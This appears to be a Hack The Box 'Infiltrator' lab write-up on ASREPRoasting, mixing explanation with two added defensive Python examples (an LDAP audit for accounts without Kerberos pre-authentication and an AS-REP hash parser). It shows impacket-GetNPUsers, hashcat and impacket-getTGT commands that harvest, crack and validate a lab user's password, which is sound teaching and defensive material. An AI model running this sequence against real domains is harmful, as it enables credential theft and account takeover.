ASREPRoasting


ASREPRoast is an attack technique that targets user accounts that do not have the Kerberos pre-authentication requirement enabled. Essentially, this weakness allows an attacker to request authentication (an AS-REQ) for such a user from the Domain Controller (DC) without knowing the user's password. The DC responds with an AS-REP whose encrypted part is protected by a key derived from the user's password, and an attacker can attempt to crack that ciphertext offline to recover the password.

The main requirements for this attack are:

  • Lack of Kerberos pre-authentication: Target users must not have this security feature enabled.
  • Connection to the Domain Controller (DC): Attackers need access to the DC to send requests and receive encrypted messages.
  • Optional domain account: Having a domain account allows attackers to more efficiently identify vulnerable users through LDAP queries. Without such an account, attackers must guess usernames.
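The first requirement above is stored on the account itself: the userAccountControl attribute carries the UF_DONT_REQUIRE_PREAUTH bit (0x400000, decimal 4194304), which is the flag impacket-GetNPUsers checks for each user. The following is an added example, not code from the write-up or from any of the tools it uses: a defender-side audit that builds the LDAP filter an administrator would run to list such accounts (using the standard bitwise-AND matching rule OID 1.2.840.113556.1.4.803) and applies the same bit test to a set of constructed sample records shaped like LDAP user objects. The account names other than those on the page are invented for the sample.

```python
# Added example (not from the original write-up): audit user records for the
# userAccountControl flag that makes an account ASREPRoastable.

# Relevant userAccountControl bits (values from the AD schema).
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # decimal 4194304

# LDAP matching-rule OID for a bitwise AND on an integer attribute.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def preauth_audit_filter(include_disabled: bool = False) -> str:
    """Build the LDAP filter that lists accounts not requiring Kerberos pre-authentication.

    By default disabled accounts are excluded: the KDC will not issue an AS-REP
    for them, so they are not roastable until re-enabled.
    """
    base = (
        "(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_DONT_REQUIRE_PREAUTH})"
    )
    if include_disabled:
        return f"(&{base})"
    return f"(&{base}(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_ACCOUNTDISABLE})))"


def find_roastable(records, include_disabled: bool = False):
    """Return the sAMAccountNames whose userAccountControl has DONT_REQUIRE_PREAUTH set.

    Mirrors the LDAP filter above, but runs offline over already-fetched records
    (userAccountControl may arrive as a string from an LDAP library, hence int()).
    """
    found = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(rec["sAMAccountName"])
    return found


# Constructed sample records: a normal user (512 = NORMAL_ACCOUNT), the page's
# l.clark with the flag set, and an invented disabled account with the flag set.
SAMPLE_RECORDS = [
    {"sAMAccountName": "a.walker", "userAccountControl": 512},
    {"sAMAccountName": "l.clark", "userAccountControl": 512 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "old.svc", "userAccountControl": "514"},  # disabled, flag clear
]
SAMPLE_RECORDS[2]["userAccountControl"] = str(514 | UF_DONT_REQUIRE_PREAUTH)

if __name__ == "__main__":
    print(preauth_audit_filter())
    print(find_roastable(SAMPLE_RECORDS))                         # ['l.clark']
    print(find_roastable(SAMPLE_RECORDS, include_disabled=True))  # ['l.clark', 'old.svc']
```

Remediation for anything the audit returns is to clear the "Do not require Kerberos preauthentication" option on the account (or document why a legacy system needs it) and to make sure the account has a long, random password, since the AS-REP's strength is exactly the password's strength.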

A total of 7 valid domain users have been enumerated via a brute-force attack with kerbrute.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-GetNPUsers INFILTRATOR.HTB/@dc01.infiltrator.htb -request -usersfile users.txt -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password:
[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@INFILTRATOR.HTB:8993011ccbd1ac64d2b62f57e2a6a23d$41f40af5e5e984f4cc68ee2bf0c23b8a2f3e255064bf606c138e5598168c13193edad6ecb260181390c9ebc357e57727865733803c6ab47dea102a167d3a23299ea7c154b0797d919569a771d8d493c7b18a2100828476bd818edbefb89f3ed56984acc17c3b0ec404d5faf98766e4ed29cf6023194a5c4ef8913a9bd61a04c12bee75b6ee1c2ef847446bec04e80b4d5dc9fca447574afe55b2314dcb4b2aef4d971780d51c11ec16dbb51b2585b99c8c7f06bfd556ae90c5bd8ab8d33ddc6e9eeee16b87b0e946a6d8477b5f3436140a33b0333b973473d0fa410a489158029a0635eb02406ba240d61e575d82edaee013

Found a user with UF_DONT_REQUIRE_PREAUTH set: l.clark

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ hashcat --show l.clark.hash                                         
 
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
 
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ hashcat -a 0 -m 18200 l.clark.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 3 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5asrep$23$l.clark@INFILTRATOR.HTB:8993011ccbd1ac64d2b62f57e2a6a23d$41f40af5e5e984f4cc68ee2bf0c23b8a2f3e255064bf606c138e5598168c13193edad6ecb260181390c9ebc357e57727865733803c6ab47dea102a167d3a23299ea7c154b0797d919569a771d8d493c7b18a2100828476bd818edbefb89f3ed56984acc17c3b0ec404d5faf98766e4ed29cf6023194a5c4ef8913a9bd61a04c12bee75b6ee1c2ef847446bec04e80b4d5dc9fca447574afe55b2314dcb4b2aef4d971780d51c11ec16dbb51b2585b99c8c7f06bfd556ae90c5bd8ab8d33ddc6e9eeee16b87b0e946a6d8477b5f3436140a33b0333b973473d0fa410a489158029a0635eb02406ba240d61e575d82edaee013:WAT?watismypass!
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$l.clark@INFILTRATOR.HTB:8993011ccbd1a...aee013
Time.Started.....: Sun Sep  1 00:33:47 2024 (3 secs)
Time.Estimated...: Sun Sep  1 00:33:50 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3728.4 kH/s (1.90ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10506240/14344385 (73.24%)
Rejected.........: 0/10506240 (0.00%)
Restore.Point....: 10493952/14344385 (73.16%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: WellHelloNow -> W14233LTKM
Hardware.Mon.#1..: Util: 52%
 
Started: Sun Sep  1 00:33:32 2024
Stopped: Sun Sep  1 00:33:50 2024

hashcat cracked the AS-REP hash for the l.clark user: WAT?watismypass! The credential must be validated.
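The line hashcat cracked is the format impacket-GetNPUsers emits for an RC4 (etype 23) AS-REP: a principal, then the 16-byte HMAC-MD5 checksum, then the RC4-encrypted enc-part, and, on a cracked line, the recovered password after a final colon. The parser below is an added example, not code from the write-up, impacket or hashcat; it splits such a line into its fields and validates them, which is the same structural check hashcat --show performs when it reports mode 18200. The sample lines are constructed with a short placeholder ciphertext (the real one above is hundreds of bytes); the principal and password are the page's own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Added example (not from the original write-up or from impacket/hashcat).
# etype-23 AS-REP hash layout as printed above:
#   $krb5asrep$23$<user>@<REALM>:<checksum>$<cipher>[:<plaintext>]
# checksum  = 16-byte HMAC-MD5 over the AS-REP enc-part (32 hex chars)
# cipher    = the RC4-encrypted enc-part (even-length hex)
# plaintext = appended only on a cracked line (hashcat --show output)

HASHCAT_MODE_ASREP_RC4 = 18200  # "Kerberos 5, etype 23, AS-REP", as hashcat --show reports above
HEX = re.compile(r"^[0-9a-fA-F]+$")


@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum_hex: str
    cipher_hex: str
    plaintext: Optional[str]  # recovered password, present only on a cracked line

    @property
    def hashcat_mode(self) -> int:
        return HASHCAT_MODE_ASREP_RC4

    @property
    def cracked(self) -> bool:
        return self.plaintext is not None


def parse_asrep_line(line: str) -> AsRepHash:
    """Split one $krb5asrep$23$ line into its fields, validating each part."""
    line = line.strip()
    prefix = "$krb5asrep$"
    if not line.startswith(prefix):
        raise ValueError("not a $krb5asrep$ line")
    etype_str, _, rest = line[len(prefix):].partition("$")
    if not etype_str.isdigit():
        raise ValueError("etype must be numeric")
    etype = int(etype_str)
    # AES AS-REPs (etype 17/18) use a different hashcat layout and mode; only RC4 is handled here.
    if etype != 23:
        raise ValueError(f"etype {etype}: only the etype 23 (RC4) layout is handled")
    # principal : checksum$cipher [: plaintext]; maxsplit=2 keeps any ':' inside the password.
    parts = rest.split(":", 2)
    if len(parts) < 2:
        raise ValueError("missing ':' between principal and encrypted data")
    principal, data = parts[0], parts[1]
    plaintext = parts[2] if len(parts) == 3 else None
    user, at, realm = principal.rpartition("@")
    if not at or not user or not realm:
        raise ValueError("principal must be user@REALM")
    checksum_hex, dollar, cipher_hex = data.partition("$")
    if not dollar or len(checksum_hex) != 32 or not HEX.match(checksum_hex):
        raise ValueError("checksum must be 32 hex characters")
    if not cipher_hex or len(cipher_hex) % 2 or not HEX.match(cipher_hex):
        raise ValueError("cipher must be an even-length hex string")
    return AsRepHash(etype, user, realm, checksum_hex.lower(), cipher_hex.lower(), plaintext)


def is_rc4_asrep_line(line: str) -> bool:
    """True if the line parses as an etype-23 AS-REP hash; never raises."""
    try:
        parse_asrep_line(line)
        return True
    except ValueError:
        return False


# Constructed sample lines with a short placeholder ciphertext.
SAMPLE_LINE = (
    "$krb5asrep$23$l.clark@INFILTRATOR.HTB:"
    "00112233445566778899aabbccddeeff$" + "deadbeef" * 8
)
SAMPLE_CRACKED = SAMPLE_LINE + ":WAT?watismypass!"

if __name__ == "__main__":
    for sample in (SAMPLE_LINE, SAMPLE_CRACKED):
        h = parse_asrep_line(sample)
        print(f"{h.user}@{h.realm} etype={h.etype} mode={h.hashcat_mode} "
              f"cipher_bytes={len(h.cipher_hex) // 2} cracked={h.cracked}")
```

Run over a file of GetNPUsers or hashcat --show output, this lets a blue team inventory which principals were exposed and which were actually cracked, so that exactly those accounts get a forced password reset and the pre-authentication flag fixed.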

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/l.clark@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: WAT?watismypass!
[*] Saving ticket in l.clark@dc01.infiltrator.htb.ccache

Successfully validated: a TGT was generated for the l.clark user.